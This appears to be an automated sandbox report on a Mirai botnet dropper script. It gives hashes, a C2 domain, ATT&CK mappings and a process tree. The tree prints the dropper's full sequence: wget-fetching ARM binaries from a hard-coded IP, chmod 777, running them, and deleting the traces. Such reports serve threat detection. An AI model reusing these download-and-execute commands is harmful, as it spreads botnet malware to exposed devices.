mirai | ce3ca0522b38c3931522cac2f1218dbc231624674dcc80ce76b4a26ecffdd8f1

Analysis

max time kernel
4s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23-11-2024 17:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ssh.sh
Size

639B
MD5

61f6f361a8641428ec15e652569064b8
SHA1

f3c5b2338ce425c32eec3abd2310ba992bd3ab94
SHA256

ce3ca0522b38c3931522cac2f1218dbc231624674dcc80ce76b4a26ecffdd8f1
SHA512

0402ef7c2bd4100f3c40ec5d2a60fe1060cd5a42f4762dd398e685db82abd221df7f260be27a3c95394ba7b0665556b2e22f860f23bf6fceda6651e1048471fe

Score

10^/10

mirai botnet defense_evasion

Malware Config

Extracted

Family

mirai

gay.nguyenletriloc.pro

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmod

pid process

1525 chmod
1531 chmod
1537 chmod
1543 chmod
1493 chmod
1499 chmod
1513 chmod
1519 chmod

pid	process
1525	chmod
1531	chmod
1537	chmod
1543	chmod
1493	chmod
1499	chmod
1513	chmod
1519	chmod

Executes dropped EXE 8 IoCs

Processes:

main_armmain_arm5main_arm6main_arm7armarm5arm6arm7

ioc	pid	process
/var/tmp/main_arm	1494	main_arm
/var/tmp/main_arm5	1500	main_arm5
/var/tmp/main_arm6	1514	main_arm6
/var/tmp/main_arm7	1520	main_arm7
/var/tmp/arm	1526	arm
/var/tmp/arm5	1532	arm5
/var/tmp/arm6	1538	arm6
/var/tmp/arm7	1544	arm7

/tmp/ssh.sh
/tmp/ssh.sh
1⤵
PID:1481
- /bin/rm
  rm -rf main_arm
  2⤵
  PID:1482
- /usr/bin/wget
  wget http://66.36.234.2/main_arm -O -
  2⤵
  PID:1483
- /bin/chmod
  chmod 777 main_arm
  2⤵
  - File and Directory Permissions Modification
  PID:1493
- /var/tmp/main_arm
  ./main_arm avtech
  2⤵
  - Executes dropped EXE
  PID:1494
- /bin/rm
  rm -rf main_arm
  2⤵
  PID:1496
- /bin/rm
  rm -rf main_arm5
  2⤵
  PID:1497
- /usr/bin/wget
  wget http://66.36.234.2/main_arm5 -O -
  2⤵
  PID:1498
- /bin/chmod
  chmod 777 main_arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1499
- /var/tmp/main_arm5
  ./main_arm5 avtech
  2⤵
  - Executes dropped EXE
  PID:1500
- /bin/rm
  rm -rf main_arm5
  2⤵
  PID:1502
- /bin/rm
  rm -rf main_arm6
  2⤵
  PID:1503
- /usr/bin/wget
  wget http://66.36.234.2/main_arm6 -O -
  2⤵
  PID:1504
- /bin/chmod
  chmod 777 main_arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /var/tmp/main_arm6
  ./main_arm6 avtech
  2⤵
  - Executes dropped EXE
  PID:1514
- /bin/rm
  rm -rf main_arm6
  2⤵
  PID:1516
- /bin/rm
  rm -rf main_arm7
  2⤵
  PID:1517
- /usr/bin/wget
  wget http://66.36.234.2/main_arm7 -O -
  2⤵
  PID:1518
- /bin/chmod
  chmod 777 main_arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1519
- /var/tmp/main_arm7
  ./main_arm7 avtech
  2⤵
  - Executes dropped EXE
  PID:1520
- /bin/rm
  rm -rf main_arm7
  2⤵
  PID:1522
- /bin/rm
  rm -rf arm
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://66.36.234.2/arm -O -
  2⤵
  PID:1524
- /bin/chmod
  chmod 777 arm
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /var/tmp/arm
  ./arm avtech
  2⤵
  - Executes dropped EXE
  PID:1526
- /bin/sh
  /bin/sh ./arm avtech
  2⤵
  PID:1526
- /bin/rm
  rm -rf arm
  2⤵
  PID:1528
- /bin/rm
  rm -rf arm5
  2⤵
  PID:1529
- /usr/bin/wget
  wget http://66.36.234.2/arm5 -O -
  2⤵
  PID:1530
- /bin/chmod
  chmod 777 arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1531
- /var/tmp/arm5
  ./arm5 avtech
  2⤵
  - Executes dropped EXE
  PID:1532
- /bin/sh
  /bin/sh ./arm5 avtech
  2⤵
  PID:1532
- /bin/rm
  rm -rf arm5
  2⤵
  PID:1534
- /bin/rm
  rm -rf arm6
  2⤵
  PID:1535
- /usr/bin/wget
  wget http://66.36.234.2/arm6 -O -
  2⤵
  PID:1536
- /bin/chmod
  chmod 777 arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /var/tmp/arm6
  ./arm6 avtech
  2⤵
  - Executes dropped EXE
  PID:1538
- /bin/sh
  /bin/sh ./arm6 avtech
  2⤵
  PID:1538
- /bin/rm
  rm -rf arm6
  2⤵
  PID:1540
- /bin/rm
  rm -rf arm7
  2⤵
  PID:1541
- /usr/bin/wget
  wget http://66.36.234.2/arm7 -O -
  2⤵
  PID:1542
- /bin/chmod
  chmod 777 arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /var/tmp/arm7
  ./arm7 avtech
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/sh
  /bin/sh ./arm7 avtech
  2⤵
  PID:1544
- /bin/rm
  rm -rf arm7
  2⤵
  PID:1546
- /bin/rm
  rm /tmp/ssh.sh
  2⤵
  PID:1547

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/tmp/main_arm

Filesize
130KB

MD5
b5b7f0c68cdf6458e137e7dfb1d74e6f

SHA1
ceb4700b167cff05ccb77a25260bf696b39b8e63

SHA256
6017dc10e1edd004384c5b0033e237a81e293d8668459c107f057fbdc62f771c

SHA512
acdcee90b0ff85e4ed35ba3ab254065b43645ddc0242f097392f8b49967642a95d393b43e039c84aa5e9c52dbfd5efd27a441162227ac3b9b169226c228a3c3d

Download Submit
/var/tmp/main_arm5

Filesize
130KB

MD5
b3d2c1afb1984b43648625b48eb1373e

SHA1
3592776c6e0f9e67c38c5a8bfff7da67629b6713

SHA256
7066eea40920fc2a9a029276906a8fd8188f501f7c14078116e0523e667687a2

SHA512
0f739303ac523d66eb032500f7bfd48bc5fa5f26bac43124a4d2564ae1a5558dfcfae7a70e45907ba7d15a82ae01d507fdd78a97de3050b5a982dcf7a5c3d627

Download Submit
/var/tmp/main_arm6

Filesize
142KB

MD5
daa33b1e666b1386b51ff9793150fdff

SHA1
999d619976b11ae71e575ced094011f0b95b1905

SHA256
d47526004f78450ce96e34f8cbb0a77a12d7aa083ff4e497a67ca65130bca32e

SHA512
c351a078605d2870a643b1822d3fcf412aad81e20a4d1dc6c505f09c64c81881d75feb1c4e6bea60814191bf3b984a2b080a950a1aa29b3cc920affd48be9fa6

Download Submit
/var/tmp/main_arm7

Filesize
179KB

MD5
0523d595f7f8b7b8bf05cb804de5f32f

SHA1
5fcd1fb36f56d96c9185ce454613946f7161df4d

SHA256
7045550dcae0e634c84ac8729c51c0972de3ec326d6541d48d2fc3fbc8c59093

SHA512
079cd6dfe752a3024837909873b6fe029fe5171ec25cd081a39b36652c52f42d75b321e3acd48e37f43f3409f82448a02b94d7eefbfe5a7ccbd73e131290439b

Download Submit